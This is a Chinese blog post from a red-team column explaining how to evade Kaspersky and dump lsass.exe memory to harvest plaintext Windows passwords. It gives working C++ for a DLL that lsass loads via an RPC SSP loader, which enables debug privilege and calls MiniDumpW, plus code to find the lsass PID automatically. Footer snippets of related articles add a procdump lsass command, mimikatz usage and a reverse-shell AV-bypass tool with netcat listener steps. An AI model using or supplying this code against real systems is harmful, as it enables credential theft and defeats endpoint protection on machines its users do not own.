绕过卡巴斯基dump进程lsass.exe内存

最新推荐文章于 2024-06-16 12:50:51 发布
最新推荐文章于 2024-06-16 12:50:51 发布
阅读量7k 收藏 13
点赞数
分类专栏: 红蓝对抗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiangshen1990/article/details/104872566
版权

绕过卡巴斯基dump进程lsass.exe内存

1:简介

起因是前两天看到QAX-Ateam的一篇关于渗透的文章《这是一篇“不一样”的真实渗透测试案例分析文章》,里面提到了学习XPN大牛的方法,绕过卡巴斯基的防护机制成功dump进程lsass.exe的内存,再将其下载到本地完成抓取明文密码的工作。
本文简单将其过程做梳理,方便使用,原理方面推荐看如下几篇文章:
(1)XPN大佬的英文原文
(2)安全客的翻译文章
(3)n1nty大牛的内容
(4)3gstudent大牛的文章
基本上看完这四篇文章,不能完全理解也能懂个大概,由于涉及内容相对深入一点,我觉得初学者就记得一个点就好:用这种办法可以绕过卡巴斯基的防护,成功dump进程lsass.exe的内存,完成明文密码抓取工作。用Ateam文章的说法就是“加载dll到lsass进程然后,让lsass.exe读自己的内存完成dump工作”。:)

2:流程

2.1:编译XPN大牛的代码

XPN大牛写了使用RPC控制lsass加载SSP的代码,这里不做过多介绍:
代码地址:https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e
这里我们要做的只是将三个文件下载到本地,使用visual studio进行编译即可。笔者使用visual studio 2019,修改了几个小地方
(1)添加如下代码

#pragma comment(lib, "Rpcrt4.lib")

(2)将两个文件的后缀名从.c改成.cpp
(3)编译时选择X64
编译XPN大牛代码得到文件:ssp_rpc_loader.exe

2.2:实现dump内存代码

正如Ateam文章中提到,有了这个exe文件,自己再用代码实现dump内存即可,这里直接放Ateam大佬们的代码:

#include <cstdio>
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
#pragma comment(lib,"Dbghelp.lib")
typedef HRESULT(WINAPI* _MiniDumpW)(
    DWORD arg1, DWORD arg2, PWCHAR cmdline);

typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
    ULONG Privilege, BOOL Enable,
    BOOL CurrentThread, PULONG Enabled);

int dump() {

    HRESULT             hr;
    _MiniDumpW          MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG               t;

    MiniDumpW = (_MiniDumpW)GetProcAddress(
        LoadLibrary(L"comsvcs.dll"), "MiniDumpW");

    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
        GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");

    if (MiniDumpW == NULL) {

        return 0;
    }
    // try enable debug privilege
    RtlAdjustPrivilege(20, TRUE, FALSE, &t);

    wchar_t  ws[100];
    swprintf(ws, 100, L"%hs", "784 c:\\1.bin full"); //784是lsass进程的pid号  "<pid> <dump.bin> full" 

    MiniDumpW(0, 0, ws);
	return 0;

}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
	switch (ul_reason_for_call) {
	case DLL_PROCESS_ATTACH:
		dump();
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

注意:在pid那个地方,这里应该输入对方电脑上lsass.exe进程的pid,所以要先确认pid,再编译这样才能准确dump进程lsass.exe的内存。

再来简单说一下代码原理,就是使用comsvcs.dll的导出函数MiniDumpW来实现dump内存,有兴趣的朋友可以自己实现以下,也可以调用MiniDumpWriteDump()实现,函数原型:

BOOL MiniDumpWriteDump(
  HANDLE                            hProcess,
  DWORD                             ProcessId,
  HANDLE                            hFile,
  MINIDUMP_TYPE                     DumpType,
  PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,
  PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
  PMINIDUMP_CALLBACK_INFORMATION    CallbackParam
);

有大牛写了代码,作为懒人就直接抄就好啦。

2.3:自动获取lsass.exe进程的pid

如2.2写的那样,这个代码有个缺点,就是需要每次先去找对方电脑lsass.exe进程的pid,而且每用一次就要编译一次,这就比较麻烦。那懒散的安全工程师肯定要改改代码。
既然我们的目标是针对lsass.exe进程,那我们只需要加上动态获取lsass.exe进程pid的代码即可。
代码如下:

#include <iostream>  
#include <string>  
#include <map>  
#include <windows.h>  
#include <TlHelp32.h> 
using namespace std;

int FindPID()
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);

    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        cout << "CreateToolhelp32Snapshot Error!" << endl;;
        return false;
    }

    BOOL bResult = Process32First(hProcessSnap, &pe32);

    while (bResult)
    {
        if (_wcsicmp(pe32.szExeFile , L"lsass.exe") == 0)
        {
            return pe32.th32ProcessID;
        }
        bResult = Process32Next(hProcessSnap, &pe32);
    }

    CloseHandle(hProcessSnap);

    return -1;
}

int main()
{
    cout << FindPID();

    return 0;
}

我们接下来要做的就是把2.2代码和2.3代码写进一个文件,修改少许,然后编译成dll即可。

3:效果

用一张图来概括吧:
注意点也如图,dll需要写绝对路径,至于1.bin文件位置,文件名去2.2修改代码即可

在这里插入图片描述

结束:)

xiangshen1990
关注
  • 0
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
绕过卡巴斯基通过RPC控制lsass注入DLL
2ed
04-16 2849
参考国外的XPN以及3gstudent大佬的文章: https://blog.csdn.net/xiangshen1990/article/details/104872566 https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0 原理:正常的ssp扩展(dll)可以加载到lsass进程中去,比如kerberos验证都是通...
dump_lsass:一个dumpWindows系统lsass.exe进程的工具
03-11
dump_lsass 一个dumpWindows系统lsass.exe进程的工具 dump_lsass_for_Win7_x64.c和dump_lsass_for_Win10_x64.c是国外一位大佬写的lsass.exe进程转储工具,参考链接: ://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process procdump.exe是一个微软官方的进程转换存储工具,主要用于抓取崩溃崩溃的内存数据,下载地址: ://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump 第1步:转储lsass.exe进程 使用prodump.exe转储(需要管理员权限) procdump.exe -accepteula -ma lsass.exe lsass_dump
遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...
11-25 2577
#zTian.red:绕过卡巴斯基、360安全卫士、Windows Defender动态执行CS、MSF命令...
内网域渗透总结
最新发布
2401_84466336的博客
06-16 825
工作组中的所有计算机是对等的。
绕过卡巴斯基主动防御系统方法的讨论
mhfh611的专栏
01-15 1689
http://huaidan.org/archives/2084.html ==Ph4nt0m Security Team==                        Issue 0x02, Phile #0x08 of 0x0A |=---------------------------------------------------------------------------=
NativePayload_ReverseShell:这是简单的C#源代码,几乎可以绕过所有“ AVS”(卡巴斯基v19,Eset v12 v13,Trend-Micro v16,Comodo和Windows Defender,通过此方法可以非常简单地绕过)-windows source code
03-25
NativePayload_ReverseShell 这是简单的C#源代码,几乎可以绕过所有“ AVS”(卡巴斯基v19,Eset v12 v13,Trend-Micro v16,Comodo和Windows Defender,通过此方法可以非常简单地绕过) 注意:它是“反向外壳类”,您可以猜测“自何时开始”:此代码有效且仍在起作用...? //// Step 1 (Linux Side:192.168.56.1) : nc -l -p 443 //// Step 2 (Windows Side:192.168.56.x) : NativePayload_ReverseShell.exe 192.168.56.1 443 循序渐进的视频: : 文章: :
lsassdump_Lsass.exe_lsassexedump_lsass.dump_dump_dumphash_
09-29
dump lsass.exe 进程
class-dump, class-dump-z.exe,class-dump-z win版本
01-19
class-dump, class-dump-z.exe,class-dump-z win版本
native_heapdump_viewer.py
07-16
使用方法如下: 1.打开Android调试开关(需要userdebug版本) setenforce 0 setprop libc.debug.malloc 1 setprop libc.debug.malloc.options backtrace stop;...对比00.log和01.log,查看内存增长的点
mysql-bin-mysql&dump.exe
08-26
mysql的命令行工具mysql.exe&mysqldump.exe
lsass杀毒软件
12-19
解决实际问题,因为这些毒大多在注册表中,lsass.exe 和smss.exe
突破内存保护dump密码
qq_31812157的博客
05-23 293
win 2008 r2 后就默认禁用了WDigest协议,所以不能直接抓到明文密码1.把mimilib.dll放到C:\WINDOWS\system32目录下2.往lsa注册表中添加Security Packages的值3.重启系统就能在c:\windows\system32目录下得到kiwissp.log的凭据记录文件上面这些操作在powersploit已有集成。
漏洞利用与卡巴斯基的对抗之路
zz_strive_2012的专栏
02-27 380
0x00 致谢 特别感谢各位朋友在这一年中对自己工作的支持,无以为报,只能凑合写一些文章来一搏各位的欢心,如有不对之处还请各位不吝指出,感激不尽! 首先感谢以下朋友给予自己的帮助: 泉哥 没谱 instruder 我可爱的同事们 0x01 题记: 主题是关于漏洞利用与卡巴斯基之间的种种对抗,之所以选择卡巴斯基是因为其在众多杀毒软件中为一个典型,从04
Hidedumpdumplsass加密免杀工具
记录学习,一起进步
05-23 1173
dumplsass
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 330
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。使用procdump转储lsass进程
导出windows密码技巧总结
渗透测试研究中心
12-16 6237
一、使用RPC控制lsass加载SSP,实现DUMP LSASS绕过杀软 1.已编译好的ssp.dll(建议自己编译) spp.dll 需要修改为完整的绝对路径,测试环境是win2012 管理员权限,提取的文件在C:\Windows\Temp\temp.bin,在windows 10 可能需要system权限。 编译成功的spp.dll文件以及loader注入器: https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/l
dump文件,windbg
热门推荐
chinabinlang的专栏
10-29 2万+
dump文件,在VC中的调试还是非常非常非常有用的,因为我们也不会经每一行代码都加上日志,当然如果你愿意,也可以每一行都加上日志; 在Windows上,添加dump文件有两种方法: 方法一:一个是在程序中添加代码; 方法二:修改注册表(参考后面的bat文件写法,在win7上用管理员程序运行);建议用这个方法,方便实用;(http://blog.csdn.net/hgy413/article/...
MiniDump文件的生成(三)
kecise的专栏
08-17 3936
本文将详细的介绍MiniDumpCallback函数使用。使用该函数可以让MiniDumpWriteDump 1) 忽略某一可执行模块的信息(全部或部分); 2)忽略某一线程的信息(全部或部分); 3)将用户指定的内存空间的内容写入生成的DMP文件中。 1. MiniDumpCallback的声明如下: CallbackParam是用户为MiniDumpCallback自定义的参数。
pg_dump.exe 导出 需要密码
02-04
pg_dump.exe 是一个用于导出 PostgreSQL 数据库的命令行工具。当你使用 pg_dump.exe 导出数据库时,系统会要求你输入密码,以确保只有授权用户可以进行数据库导出操作。 密码是为了保护数据库的安全性而设置的,只有知道密码的人可以进行数据库导出操作。这有助于防止未经授权的访问和数据泄漏。 在使用 pg_dump.exe 导出数据库时,你需要输入正确的密码才能成功完成导出操作。如果输入的密码与数据库设置的密码不匹配,系统会提示密码错误并拒绝导出操作。 通过设置密码,可以有效地限制对数据库的访问,并防止未经授权的用户获取敏感数据。因此,确保密码的安全性非常重要,应该选择一个强密码,不要与其他账户使用的密码相同,并定期更改密码以增强数据库的安全性。 总而言之,使用 pg_dump.exe 导出数据库需要密码,这是为了保护数据库的安全性和防止未经授权的访问导致数据泄漏。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值